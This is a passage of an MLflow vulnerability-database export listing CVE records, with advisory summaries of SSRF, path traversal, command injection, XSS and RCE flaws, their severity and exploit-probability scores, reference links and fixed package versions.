vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-96az-gdtg-aka8
5
vulnerability VCID-9mak-nkua-3uhr
6
vulnerability VCID-axte-ftrh-4bb7
7
vulnerability VCID-fxtg-yezw-hfhr
8
vulnerability VCID-kqsy-qu8j-8ugj
9
vulnerability VCID-scm3-63j1-tkf2
10
vulnerability VCID-tnps-h89q-a7hj
11
vulnerability VCID-wphf-gk61-8ube
12
vulnerability VCID-xdur-8vs8-jfcy
13
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.5.0
aliases CVE-2025-14279, GHSA-pgqp-8h46-6x4j
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7ykf-b93e-w7am
5
url VCID-96az-gdtg-aka8
vulnerability_id VCID-96az-gdtg-aka8
summary A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2393
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.1052
published_at 2026-06-11T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.12212
published_at 2026-06-14T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12229
published_at 2026-06-12T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12234
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2393
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2393
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2393
3
reference_url https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150
reference_id 04ef100d-06b5-4a70-95b1-b7be23aa8150
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:19Z/
url https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150
4
reference_url https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389
reference_id 64aa0ab7207f9c649b59ba1a5f40d82196817389
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:19Z/
url https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389
5
reference_url https://github.com/advisories/GHSA-65h7-c7c4-mghx
reference_id GHSA-65h7-c7c4-mghx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65h7-c7c4-mghx
fixed_packages
0
url pkg:pypi/mlflow@3.9.0
purl pkg:pypi/mlflow@3.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-7ach-q3x2-3uat
4
vulnerability VCID-fxtg-yezw-hfhr
5
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0
aliases CVE-2026-2393, GHSA-65h7-c7c4-mghx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-96az-gdtg-aka8
6
url VCID-97xj-trtn-g7ah
vulnerability_id VCID-97xj-trtn-g7ah
summary gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-52967
reference_id
reference_type
scores
0
value 0.00247
scoring_system epss
scoring_elements 0.48399
published_at 2026-06-13T12:55:00Z
1
value 0.00247
scoring_system epss
scoring_elements 0.48384
published_at 2026-06-14T12:55:00Z
2
value 0.00247
scoring_system epss
scoring_elements 0.48381
published_at 2026-06-12T12:55:00Z
3
value 0.00247
scoring_system epss
scoring_elements 0.48243
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-52967
1
reference_url https://github.com/advisories/GHSA-wxj7-3fx5-pp9m
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wxj7-3fx5-pp9m
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/releases/tag/v2.22.2
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v2.22.2
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2025-52.yaml
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2025-52.yaml
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-52967
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-52967
6
reference_url https://github.com/mlflow/mlflow/issues/15944
reference_id 15944
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/issues/15944
7
reference_url https://github.com/mlflow/mlflow/pull/15970
reference_id 15970
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/pull/15970
8
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.1.0
reference_id v3.1.0
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/releases/tag/v3.1.0
fixed_packages
0
url pkg:pypi/mlflow@2.22.2
purl pkg:pypi/mlflow@2.22.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-k79p-ju8g-9bhe
11
vulnerability VCID-kqsy-qu8j-8ugj
12
vulnerability VCID-scm3-63j1-tkf2
13
vulnerability VCID-tnps-h89q-a7hj
14
vulnerability VCID-w5et-zcp1-zfdb
15
vulnerability VCID-wphf-gk61-8ube
16
vulnerability VCID-xdur-8vs8-jfcy
17
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.2
1
url pkg:pypi/mlflow@3.0.0rc0
purl pkg:pypi/mlflow@3.0.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-k79p-ju8g-9bhe
11
vulnerability VCID-kqsy-qu8j-8ugj
12
vulnerability VCID-scm3-63j1-tkf2
13
vulnerability VCID-tnps-h89q-a7hj
14
vulnerability VCID-w5et-zcp1-zfdb
15
vulnerability VCID-wphf-gk61-8ube
16
vulnerability VCID-xdur-8vs8-jfcy
17
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.0.0rc0
2
url pkg:pypi/mlflow@3.1.0
purl pkg:pypi/mlflow@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-9mak-nkua-3uhr
7
vulnerability VCID-axte-ftrh-4bb7
8
vulnerability VCID-fxtg-yezw-hfhr
9
vulnerability VCID-kqsy-qu8j-8ugj
10
vulnerability VCID-scm3-63j1-tkf2
11
vulnerability VCID-tnps-h89q-a7hj
12
vulnerability VCID-w5et-zcp1-zfdb
13
vulnerability VCID-wphf-gk61-8ube
14
vulnerability VCID-xdur-8vs8-jfcy
15
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.1.0
aliases BIT-mlflow-2025-52967, CVE-2025-52967, GHSA-wxj7-3fx5-pp9m, PYSEC-2025-52
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-97xj-trtn-g7ah
7
url VCID-9mak-nkua-3uhr
vulnerability_id VCID-9mak-nkua-3uhr
summary A path traversal vulnerability exists in the `extract_archive_to_dir` function within the `mlflow/pyfunc/dbconnect_artifact_cache.py` file of the mlflow/mlflow repository. This vulnerability, present in versions before v3.7.0, arises due to the lack of validation of tar member paths during extraction. An attacker with control over the tar.gz file can exploit this issue to overwrite arbitrary files or gain elevated privileges, potentially escaping the sandbox directory in multi-tenant or shared cluster environments.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15036.json
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15036.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15036
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13748
published_at 2026-06-14T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13777
published_at 2026-06-13T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.1366
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15036
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15036
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15036
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452925
reference_id 2452925
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452925
5
reference_url https://huntr.com/bounties/36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
reference_id 36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-30T14:01:01Z/
url https://huntr.com/bounties/36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
6
reference_url https://github.com/mlflow/mlflow/commit/3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
reference_id 3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-30T14:01:01Z/
url https://github.com/mlflow/mlflow/commit/3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
7
reference_url https://github.com/advisories/GHSA-vhcx-3pq2-4fvc
reference_id GHSA-vhcx-3pq2-4fvc
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vhcx-3pq2-4fvc
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15036, GHSA-vhcx-3pq2-4fvc
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9mak-nkua-3uhr
8
url VCID-axte-ftrh-4bb7
vulnerability_id VCID-axte-ftrh-4bb7
summary A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0596
reference_id
reference_type
scores
0
value 0.00193
scoring_system epss
scoring_elements 0.41277
published_at 2026-06-14T12:55:00Z
1
value 0.00193
scoring_system epss
scoring_elements 0.41099
published_at 2026-06-11T12:55:00Z
2
value 0.00193
scoring_system epss
scoring_elements 0.41286
published_at 2026-06-13T12:55:00Z
3
value 0.00193
scoring_system epss
scoring_elements 0.41265
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0596
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/commit/202fac4c83ccc8544c087c142b80196d0e60695c
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/202fac4c83ccc8544c087c142b80196d0e60695c
3
reference_url https://github.com/mlflow/mlflow/pull/19738
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/19738
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0596
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0596
5
reference_url https://huntr.com/bounties/2e905add-f9f5-4309-a3db-b17de5981285
reference_id 2e905add-f9f5-4309-a3db-b17de5981285
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T17:19:22Z/
url https://huntr.com/bounties/2e905add-f9f5-4309-a3db-b17de5981285
6
reference_url https://github.com/advisories/GHSA-rvhj-8chj-8v3c
reference_id GHSA-rvhj-8chj-8v3c
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rvhj-8chj-8v3c
fixed_packages
0
url pkg:pypi/mlflow@3.9.0
purl pkg:pypi/mlflow@3.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-7ach-q3x2-3uat
4
vulnerability VCID-fxtg-yezw-hfhr
5
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0
aliases CVE-2026-0596, GHSA-rvhj-8chj-8v3c
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axte-ftrh-4bb7
9
url VCID-fxtg-yezw-hfhr
vulnerability_id VCID-fxtg-yezw-hfhr
summary
MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. 

This issue affects MLflow versions through 3.10.1.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33865.json
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33865.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33865
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01315
published_at 2026-06-11T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01312
published_at 2026-06-12T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01322
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01839
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33865
2
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://cert.pl/en/posts/2026/04/CVE-2026-33865
3
reference_url https://github.com/advisories/GHSA-fh64-r2vc-xvhr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fh64-r2vc-xvhr
4
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
5
reference_url https://github.com/mlflow/mlflow/commit/aca4dd0ec88a12f7655155c224371280e9b45dda
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/aca4dd0ec88a12f7655155c224371280e9b45dda
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-93.yaml
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-93.yaml
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33865
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33865
8
reference_url https://github.com/mlflow/mlflow/pull/21435
reference_id 21435
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://github.com/mlflow/mlflow/pull/21435
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2455899
reference_id 2455899
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2455899
10
reference_url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_id attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
11
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
reference_id CVE-2026-33865
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
1
url pkg:pypi/mlflow@3.11.1
purl pkg:pypi/mlflow@3.11.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.1
aliases BIT-mlflow-2026-33865, CVE-2026-33865, GHSA-fh64-r2vc-xvhr, PYSEC-2026-93
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fxtg-yezw-hfhr
10
url VCID-k79p-ju8g-9bhe
vulnerability_id VCID-k79p-ju8g-9bhe
summary
MLflow Tracking Server Model Creation Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of model file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26921.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11201
reference_id
reference_type
scores
0
value 0.17936
scoring_system epss
scoring_elements 0.95314
published_at 2026-06-12T12:55:00Z
1
value 0.17936
scoring_system epss
scoring_elements 0.95321
published_at 2026-06-14T12:55:00Z
2
value 0.17936
scoring_system epss
scoring_elements 0.95319
published_at 2026-06-13T12:55:00Z
3
value 0.17936
scoring_system epss
scoring_elements 0.95299
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11201
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
